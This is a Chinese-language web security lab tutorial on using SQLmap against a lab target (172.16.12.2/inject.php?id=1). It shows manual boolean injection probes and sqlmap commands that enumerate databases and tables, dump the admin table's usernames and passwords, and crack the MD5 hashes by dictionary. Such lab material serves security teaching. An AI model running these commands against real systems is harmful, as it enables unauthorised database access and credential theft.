web安全实验-SQLmap工具-SQLmap初步

01SQLmap进行注入点判断

SQLmap: SQLmap是一个自动化的SQL注入工具，主要功能是扫描，发现并利用SQL注入漏洞

支持的数据库

MySQL，Oracle，PostgreSQL，Microsoft SQL Server,Microsoft SQL Server，Microsoft Access，IBM DB2，SQLite，Firebird，Sybase，SAP MaxDB

SQLmap采用几种独特的SQL注入技术

盲推理SQL注入

UNION查询SQL注入

堆查询

盲注

广泛的功能和选项包括数据库指纹，枚举，数据库提取，访问目标文件系统，并在获取完全操作权限时实行任意命令。

02SQLmap注入出数据

步骤1：注入点判断

http://172.16.12.2/inject.php?id=1

id=1 可能是一个与数据库进行交互的参数

id=1后面加上语句 探测那些语句是否怎地被带入查询

id=1 and 0

http://172.16.12.2/inject.php?id=1 and 0 假

http://172.16.12.2/inject.php?id=1 and 1 真

SQLmap工具进行注入测试

python sqlmap.py -u “http://172.16.12.2/inject.php?id=1"

-u 参数指定目标注入地址

识别mysql数据库

it looks likee MySQL y

注入等级

level y

id 这个参数被认定是可注入参数

id is vulnerable 直接回车

返回信息

web server Windows

web application PHP 5.3.29 Apache 2.4.10

MySQL >= 5.5

步骤2 注入出数据

python sqlmap.py -u “http://172.16.12.2/inject.php?id=1" –dbs

–dbs 列数据库

python sqlmap.py -u “http://172.16.12.2/inject.php?id=1" –current-db

–current-db 列当前数据库

python sqlmap.py -u “http://172.16.12.2/inject.php?id=1" -D sqlinject –tables

-D dbname 指定数据库名称

–tables 列出某数据库上的所有表

python sqlmap.py -u “http://172.16.12.2/inject.php?id=1" -D sqlinject -T admin –columns

-D dbname 指定数据库名称

-T tablename 指定某数据表名称

–columns 列出指定表上的所有列

python sqlmap.py -u “http://172.16.12.2/inject.php?id=1" -D sqlinject -T admin -C id,username,password –dump

-D dbname 指定数据库名称

-T tablename 指定某数据表名称

-C Cnmme 指定列名

–dump 导出列里面的字段

do you want to crack them via a dictionary-based attck?[y/n/q]

导出的数据经过MD5加密，通过字典爆破数据密码

直接回车

do you want to use？

选择什么字典

1